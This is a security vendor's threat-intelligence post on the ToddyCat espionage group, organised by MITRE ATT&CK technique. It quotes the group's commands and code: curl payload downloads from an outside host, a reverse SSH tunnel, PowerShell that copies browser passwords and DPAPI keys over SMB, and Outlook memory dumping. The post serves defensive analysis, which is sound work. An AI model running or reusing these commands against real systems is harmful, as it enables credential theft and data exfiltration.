Dissecting ToddyCat Cyber Espionage and MITRE TTPs

Picus Labs | 15 MIN READ

LAST UPDATED ON JANUARY 07, 2026

ToddyCat began operations in December 2020 by compromising Microsoft Exchange servers in Taiwan and Vietnam using an unidentified vulnerability, but the group quickly escalated its efforts in February 2021 to target high-profile organizations across Europe and Asia by abusing the ProxyLogon vulnerability. By September 2021, their focus expanded to desktop systems in Central Asia using the Ninja Trojan delivered via Telegram, and recent activities in 2024 featured complex tools like TCESB to exploit ESET scanners and a PowerShell variant of TomBerBil designed to harvest credentials from domain controllers.

The group employs a diverse set of tactics, techniques, and procedures, primarily utilizing PowerShell and Windows Command Shell to execute malicious scripts while maintaining persistence through scheduled tasks and reverse SSH tunnels. Their defense evasion is particularly sophisticated, incorporating the "Bring Your Own Vulnerable Driver" (BYOVD) technique, DLL side-loading, and specialized tools like TCSectorCopy to bypass file locks on Outlook data. Furthermore, ToddyCat facilitates lateral movement via SMB shares to extract credentials from browsers and process memory, ultimately compressing the stolen data with utilities like WinRAR for exfiltration over C2 channels.

In this post, we will review ToddyCat's major historical operations and dissect the group’s tactics, techniques, and procedures to understand how they execute stealthy cyber-espionage campaigns. In the end, we will show how Picus helps defend against this group.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

What Are the Major Activities of the ToddyCat Group?

December 2020 – ToddyCat launched a campaign targeting Microsoft Exchange servers in Taiwan and Vietnam. The group utilized an unidentified vulnerability to deploy the China Chopper web shell. This initial breach facilitated a complex infection sequence, involving specialized loaders that ultimately installed a passive backdoor known as Samurai [1].

26 February 2021 – The group began a rapid escalation of attacks, abusing the ProxyLogon vulnerability to compromise multiple high-profile organizations across Europe and Asia. While the infection vector changed to ProxyLogon, the subsequent attack chain remained consistent with their earlier campaigns [1].

September 2021 – ToddyCat expanded its tactics to target desktop systems in Central Asia, distributing loaders for the Ninja Trojan via Telegram as zip archives containing executable files [1].

Early 2024 – Kaspersky detected a suspicious file named version.dll in temporary directories on compromised devices, identifying it as a complex tool called TCESB. This tool was designed to execute payloads stealthily by exploiting a vulnerability in the ESET command-line scanner [2].

May–June 2024 – A new PowerShell variant of the TomBerBil tool was detected in incidents, executed on domain controllers to access browser files via SMB shares. This variant harvested credentials and cookies from Chrome, Edge, and Firefox [3].

Which MITRE ATT&CK Techniques Are Used by ToddyCat?

The following section provides an in-depth breakdown of the TTPs linked to ToddyCat, consolidating intelligence findings from multiple distinct operations [4] [3] [2].

Tactic: Execution

T1059.001 Command and Scripting Interpreter: PowerShell

PowerShell is utilized to execute scripts that automate the theft of sensitive data from the victim's environment. Execution policies are bypassed to run malicious scripts, such as ip445.ps1, which resides in the ProgramData directory.

The script establishes a working directory to stage the collected data. The following code snippet illustrates the initialization of this directory:

$baseDir = 'c:\programdata\temp\'

try{
New-Item -ItemType directory -Path $baseDir | Out-Null
}catch{

}

T1059.003 Command and Scripting Interpreter: Windows Command Shell

The Windows Command Shell is frequently employed to manage files, configure the environment, and execute tools.

Batch scripts, such as a.bat, are used to modify file permissions and conceal private key files by removing access rights for specific user groups:

@echo off
::# Set Key File Variable:

Set Key="C:\Windows\AppReadiness"

takeown /f "%Key%"
icacls "%Key%" /remove "BUILTIN\Administrators" > "%temp%\a.txt"
icacls "%Key%" /remove "Administrators" >> "%temp%\a.txt"
icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" >> "%temp%\a.txt"
icacls "%Key%" /remove "CREATOR OWNER" >> "%temp%\a.txt"
icacls "%Key%" /remove "BUILTIN\Users" >> "%temp%\a.txt"
icacls "%Key%" /remove "Users" >> "%temp%\a.txt"
icacls "%Key%" >> "%temp%\a.txt"

::# Remove Variable:
set "Key="

Furthermore, cmd.exe is utilized to invoke the curl utility for downloading payloads from remote servers. The downloaded files are often saved with temporary filenames:

"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o c:\windows\debug\wia\wia.exe > C:\WINDOWS\Temp\vwqkspeq.tmp 2>&1

"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o c:\windows\debug\wia\hamcore.se2 > C:\WINDOWS\Temp\nohEicOE.tmp 2>&1

Command shell instructions are also used to install and configure tools like the SoftEther VPN server and the Krong tool:

"cmd.exe" /C c:\users\public\music\taskllst.exe /install > C:\Windows\Temp\fnOcaiqm.tmp 2>&1

"cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray > C:\Windows\Temp\TSwkLRsR.tmp

"cmd" /c "cd C:\windows\temp & SystemInformation.exe 0.0.0.0 54112"

T1569.002 System Services: Service Execution

To ensure persistence and route traffic from Command and Control (C2) servers, the FRP client is executed as a service with an arbitrary name. The following command initiates the FRP client using a specific configuration file:

C:\windows\debug\tck.exe -c c:\windows\debug\tc.ini

Tactic: Persistence

T1053.005 Scheduled Task/Job: Scheduled Task

Scheduled tasks are relied upon to maintain persistence and periodically execute data collection tools, such as TomBerBil. This ensures continued access to the compromised environment. One such task executes a PowerShell command to bypass policies and run a script located in ProgramData:

powershell -exec bypass -command "c:\programdata\ip445.ps1"

Additionally, scheduled tasks are created to launch reverse SSH tunnels, redirecting network traffic from a remote server to the infected host. The following command is used to establish this connection:

C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o StrictHostKeyChecking=accept-new -R 31481:localhost:53 systemtest01@103.27.202.85 -p 22222 -N

Tactic: Defense Evasion

T1006 Direct Volume Access

To bypass file locks utilized by the Outlook application, a specialized tool named TCSectorCopy is employed. Outlook stores data in OST (Offline Storage Table) files, which are locked while the application is running. TCSectorCopy, a 32-bit C++ PE file, opens the disk as a device in read-only mode and copies the file content block by block, circumventing the standard Windows API.

The command used to copy the locked OST file is as follows:

xCopy.exe C:\Users\<user>\AppData\Local\Microsoft\Outlook\<email>@<domain>.ost <email>@<domain>.ost2

T1027 Obfuscated Files or Information

Payload data is encrypted to conceal its contents. In one instance, files are encrypted using the AES-128 algorithm, with the decryption key stored in the first 32 bytes of the payload file. The following code snippet demonstrates how the key is read and processed:

ReadFile(hFile, pbData, 32u, &NumberOfBytesRead, 0i64);
if ( !CryptHashData(phHash, pbData, 32u, 0) || !CryptDeriveKey(phProv, CALG_AES_128, phHash, 0, phKey) )
return 0i64;

Traffic transmitted through the Krong proxy is encrypted using an XOR function to hide the nature of the data.

Furthermore, standard file extensions are altered to mask malicious files; for example, OpenSSH private keys are renamed with .ini or .dat extensions, and configuration files are renamed from .toml to .ini:

C:\Windows\AppReadiness\read.ini
C:\Windows\AppReadiness\data.dat
C:\Windows\AppReadiness\log.dat
C:\Windows\AppReadiness\value.dat

T1036.005 Masquerading: Match Legitimate Name or Location

Executable files, such as the SoftEther VPN server (vpnserver_x64.exe), are renamed to resemble legitimate system files or security products to evade detection. Observed masqueraded file paths include:

c:\programdata\ssh\vmtools.exe
c:\programdata\lenovo\lenovo_kln.exe
c:\programdata\iobit\iobitrtt\tmp\realtime.exe
c:\perflogs\ecache\host.exe
C:\users\public\music\wia.exe
c:\windows\debug\wja\wia.exe
c:\users\public\music\tasklist.exe
c:\programdata\lenovo\Lenovo_main.exe
c:\programdata\intel\gcc\gcc\boot.exe
c:\programdata\lenovo\Lenovodisplaycontrolcenterservice\netscan.exe
c:\programdata\kasperskylab\kaspersky.exe

Additionally, a variant of the TomBerBil tool mimics Kaspersky Anti-Virus by using the name avpui.exe and including relevant metadata.

T1211 Exploitation for Defense Evasion

The "Bring Your Own Vulnerable Driver" (BYOVD) technique is employed to modify kernel structures by installing a vulnerable driver, DBUtilDrv2.sys (CVE-2021-36276). This driver is installed via the Device Manager interface using an INF file. The decompiled code for installing the driver is shown below:

HANDLE installDriver()
{
HANDLE result; // rax
WCHAR a1[32]; // [rsp+40h] [rbp-258h] BYREF
WCHAR Filename[268]; // [rsp+80h] [rbp-218h] BYREF

if ( hObject )
goto LABEL_7;
memset(Filename, 0, 0x208ui64);
GetModuleFileNameW(0i64, Filename, 0x104u);
PathRemoveFileSpecW(Filename);
strcpy(Filename, L"\\dbutildrv2.INF");
if ( SetupDi(Filename, L"ROOT\\DBUtilDrv2", 0x26u, &DeviceInfoOut, &DeviceInfoData) )
logInfo(L"supSetupInstallDriverFromInf Success\n");
else
logInfo(L"supSetupInstallDriverFromInf Failed %d\n");

T1574.001 Hijack Execution Flow: DLL

Malicious code is executed via a DLL-proxying technique where a malicious version.dll exports all functions of the legitimate system file but redirects calls to the original DLL while running malicious payloads. This exploits the CVE-2024-11859 vulnerability in a command-line scanner (ecls), which insecurely loads the library from the current directory.

Also, the Krong tool is implemented as a DLL file that is side-loaded by a legitimate application digitally signed by AVG TuneUp. This enables the malicious code to execute within the context of a trusted process.

Tactic: Credential Access

T1528 Steal Application Access Token

To obtain OAuth 2.0 authorization tokens, the process memory of Microsoft 365 applications is dumped. While "SharpTokenFinder" is a primary tool, "ProcDump" from the Sysinternals suite is utilized if local security tools block initial attempts.

procdump64.exe -accepteula -ma OUTLOOK.exe

dir c:\windows\temp\OUTLOOK.EXE_id.dmp

T1555.003 Credentials from Password Stores: Credentials from Web Browsers

Saved logins, passwords, and other sensitive data are extracted from web browsers. Tools target the "Login Data" file in Chrome and Edge, and files such as key3.db, signons.sqlite, and logins.json in Firefox. The WAExp tool specifically targets the web version of WhatsApp by collecting local storage files from these browsers.

The following PowerShell code demonstrates the copying of the "Login Data" file:

$googlepath = $upath + "\google\"
$firefoxpath = $upath + "\firefox\"
$edgepath = $upath + "\edge\"
$loginDataPath = $item.FullName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data"

if(test-path -path $loginDataPath) {
$dstFileName = "{0}\{1}" -f $googlepath, "Login Data"
copy-item -Force -Path $loginDataPath -Destination $dstFileName -Out-Null
}

For Firefox, the script iterates through profiles to locate specific files:

$firefox_files = @("key3.db", "signons.sqlite", "key4.db", "logins.json")
$firefoxBase = $item.FullName + "\AppData\Roaming\Mozilla\Firefox\Profiles"

if(test-path -path $firefoxBase) {
$profiles = get-childitem $firefoxBase -Force -ErrorAction SilentlyContinue
foreach($profile in $profiles){
if (test-path -path ($firefoxpath + $profile.Name)){
New-Item -ItemType directory -Path ($firefoxpath + $profile.Name) -Out-Null
}
foreach($firefox_file in $firefox_files){
$tmpPath = $firefoxBase + "\" + $profile.Name + "\" + $firefox_file
if(test-path -path $tmpPath) {
$dstFileName = "{0}\{1}\{2}" -f $firefoxpath, $profile.Name, $firefox_file
copy-item -Force -Path $tmpPath -Destination $dstFileName -Out-Null
}
}
}
}

T1555.004 Credentials from Password Stores: Windows Credential Manager

Tools also attempt to copy files associated with Microsoft Credentials and DPAPI master keys.

if(test-path -path ($item.FullName + "\AppData\Local\Microsoft\Credentials")) {
copy-item -Recurse -Force -Path ($item.FullName + "\AppData\Local\Microsoft\Credentials") -Destination ($upath) -Out-Null
}

if(test-path -path ($item.FullName + "\AppData\Roaming\Microsoft\Protect")){
copy-item -Recurse -Force -Path ($item.FullName + "\AppData\Roaming\Microsoft\Protect") -Destination ($upath) -Out-Null
}

Tactic: Discovery

T1018 Remote System Discovery

Reconnaissance is performed using SSH tunnels established on domain controllers. DNS queries are utilized to identify the IP addresses of hosts within the internal network.

T1033 System Owner/User Discovery

The TomBerBil tool identifies users by enumerating all running processes and searching for instances of explorer.exe. It utilizes WMI requests to the Win32_Process class to retrieve the user and domain name for a given process ID.

{
string result = null;
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(new SelectQuery("Select * from Win32_Process WHERE processID=" + pID));
try
{
using (ManagementObjectCollection.ManagementObjectEnumerator enumerator = managementObjectSearcher.Get().GetEnumerator())
{
if (enumerator.MoveNext())
{
ManagementObject managementObject = (ManagementObject)enumerator.Current;
ManagementBaseObject methodParameters = managementObject.GetMethodParameters("GetOwner");
result = managementObject.InvokeMethod("GetOwner", methodParameters, null)["User"].ToString();
}
}
}
catch
{
result = "SYSTEM";
}
return result;
}

T1057 Process Discovery

Tools like "SharpTokenFinder" search the system for specific processes associated with the Microsoft 365 suite, including "TEAMS", "WINWORD", "ONENOTE", "POWERPNT", "OUTLOOK", "EXCEL", "ONEDRIVE", and "SHAREPOINT".

T1082 System Information Discovery

To locate necessary memory offsets, tools identify the operating system kernel version. This version is compared against a CSV file stored in the tool's resources or data retrieved from a PDB file.

T1083 File and Directory Discovery

Scripts enumerate user directories on remote hosts to identify data collection targets, excluding specific folders.

$filter_users = @('public','all users','default','default user','desktop.ini','.net v4.5','.net v4.5 classic')

foreach($item in $items){

$username = $item.Name
if($filter_users -contains $username.tolower()){
continue
}
$upath = $lpath + '\' + $username

try{
New-Item -ItemType directory -Path $upath | Out-Null
New-Item -ItemType directory -Path ($upath + '\google') | Out-Null
New-Item -ItemType directory -Path ($upath + '\firefox') | Out-Null
New-Item -ItemType directory -Path ($upath + '\edge') | Out-Null
}catch{

}

Also, the cuthead tool performs a recursive search for documents with specific extensions (e.g., PDF, DOC, DOCX, XLS, XLSX) or keywords, optimizing the search by excluding directories such as "Windows", "Program Files", "ProgramData", "Application Data", and "Documents and Settings".

Tactic: Lateral Movement

T1021.002 Remote Services: SMB/Windows Admin Shares

Connections to remote hosts are established via the SMB protocol to access the C$ share and reach user directories.

foreach($myhost in parseFile('c:\programdata\uhosts.txt')){
$myhost=$myhost.TrimEnd()
$open=$false

$cpath = "\\{0}\c$\users\" -f $myhost
$items = @(get-childitem $cpath -Force -ErrorAction SilentlyContinue)

$lpath = $baseDir + $myhost
try{
New-Item -ItemType directory -Path $lpath | Out-Null
}catch{

}

Additionally, files required for the attack, including SSH clients and private keys, are transferred to target hosts using these shared folders.

Tactic: Collection

T1005 Data from Local System

The cuthead tool collects large volumes of data from the local file system by searching for files based on extensions and keywords. The following command collects MS Excel, MS Word, and PDF files modified after a specific date:

"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx

T1114.001 Email Collection: Local Email Collection

Corporate email correspondence is stolen by copying local Outlook OST files using the "TCSectorCopy" tool. Once the files are obtained, the content is extracted using "XstReader".

XstExport.exe -e <mail>@<domain>.ost2

T1560.001 Archive Collected Data: Archive via Utility

Collected data, including process memory dumps, is compressed into archives using the WinRAR utility before exfiltration.

c:\progra~1\winrar\rar.exe a -k -r -s -m5 -1024M tempdmp.rar c:\windows\temp\OUTLOOK.EXE_id.dmp

In some scenarios, a shadow copy of the disk is created, and user data is archived using the 7-Zip utility.

wmic shadowcopy call create Volume=C:\

"cmd" /c c:\intel\7za.exe a c:\intel\1.7z \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\<username>\AppData\Local\Google\Chrome\"User Data"

T1560.002 Archive Collected Data: Archive via Library

Data is also compressed using software libraries; cuthead uses SharpZipLib (version 0.85.4.369) to create ZIP archives protected with the password "Unsafe404".

Similarly, WAExp utilizes the System.IO.Compression.ZipFile module to pack WhatsApp data.

Tactic: Exfiltration

T1041 Exfiltration Over C2 Channel

Collected and archived data, including browser profiles and files gathered by tools like cuthead and WAExp, are exfiltrated through the established command and control channels.

How Picus Simulates ToddyCat Attacks?

We also strongly suggest simulating ToddyCat Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for ToddyCat:

Threat ID	Threat Name	Attack Module
93286	ToddyCat Threat Group Campaign Backdoor Malware Download Threat	Network Infiltration
76195	ToddyCat Threat Group Campaign Backdoor Malware Email Threat	Network Infiltration
24249	ToddyCat Threat Group Campaign Malware Email Threat	Network Infiltration
22363	ToddyCat Threat Group Campaign Malware Download Threat	Network Infiltration
83850	ToddyCat Threat Group Campaign	Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the ToddyCat Group?

ToddyCat is also known as: Websiic, Storm-0247.

Key Takeaways

ToddyCat has evolved from compromising Microsoft Exchange servers in Asia to targeting high-profile organizations across Europe and Central Asia using the Ninja Trojan and ProxyLogon exploits.
Recent operations in 2024 involved complex tools like TCESB to exploit vulnerabilities in ESET scanners and a PowerShell variant of TomBerBil designed to harvest credentials from domain controllers.
The group employs sophisticated defense evasion strategies, including the Bring Your Own Vulnerable Driver (BYOVD) technique and DLL side loading to execute malicious payloads within trusted processes.
Persistence and execution are maintained through the use of scheduled tasks, reverse SSH tunnels, and extensive PowerShell or Windows Command Shell scripts.
Lateral movement is facilitated via SMB shares to access C$ shares on remote hosts, allowing the attackers to transfer SSH clients and extract credentials from user directories.
Specialized tools such as TCSectorCopy are utilized to bypass file locks on Outlook OST files, enabling the theft of email data, which is then extracted using XstReader.
The group steals credentials by dumping process memory for OAuth tokens and extracting saved logins from browsers, ultimately compressing all stolen data with WinRAR or 7 Zip for exfiltration.

References

[1] G. Dedola, “APT ToddyCat,” Kaspersky. Accessed: Dec. 11, 2025. [Online]. Available: https://securelist.com/toddycat/106799/

[2] A. Gunkin, “How ToddyCat tried to hide behind AV software,” Kaspersky. Accessed: Dec. 11, 2025. [Online]. Available: https://securelist.com/toddycat-apt-exploits-vulnerability-in-eset-software-for-dll-proxying/116086/

[3] A. Gunkin, “ToddyCat: your hidden email assistant. Part 1,” Kaspersky. Accessed: Dec. 11, 2025. [Online]. Available: https://securelist.com/toddycat-apt-steals-email-data-from-outlook/118044/

[4] A. Gunkin, “ToddyCat is making holes in your infrastructure,” Kaspersky. Accessed: Dec. 11, 2025. [Online]. Available: https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/

ToddyCat began operations in December 2020 by compromising Microsoft Exchange servers in Taiwan and Vietnam. They quickly escalated efforts in February 2021 to target organizations in Europe and Asia using ProxyLogon. By September 2021, the group targeted desktop systems in Central Asia with the Ninja Trojan. Recent 2024 activities involve complex tools like TCESB and updated variants of TomBerBil targeting domain controllers.

The group primarily utilizes PowerShell and Windows Command Shell to execute scripts for data theft and environment configuration. They bypass execution policies to run malicious scripts like ip445.ps1. Additionally, they use the "Bring Your Own Vulnerable Driver" (BYOVD) technique and DLL side-loading to execute payloads while evading defense mechanisms.

ToddyCat employs tools like TomBerBil to harvest credentials and cookies from web browsers, including Chrome, Edge, and Firefox. They also dump process memory from Microsoft 365 applications using tools like SharpTokenFinder and ProcDump to obtain OAuth 2.0 tokens. Furthermore, scripts are used to exfiltrate data from Windows Credential Manager and DPAPI master keys.

The group renames executable files to resemble legitimate system files or security products, such as renaming VPN servers to look like Kaspersky or Lenovo updates. They use specialized tools like TCSectorCopy to bypass file locks on Outlook data. Additionally, they encrypt payload data using AES-128 and modify file extensions, for instance, changing OpenSSH private keys to .ini or .dat files.

To ensure continued access, ToddyCat relies on scheduled tasks that periodically execute data collection tools and reverse SSH tunnels. These tunnels redirect network traffic from a remote server to the infected host.

Picus enables organizations to simulate APT attacks and validate their security effectiveness. By offering a 14-Day Free Trial of the Picus Platform, Picus allows security teams to test their defenses against the specific tactics, techniques, and procedures employed by ToddyCat. This helps identify gaps in security posture before real attacks occur.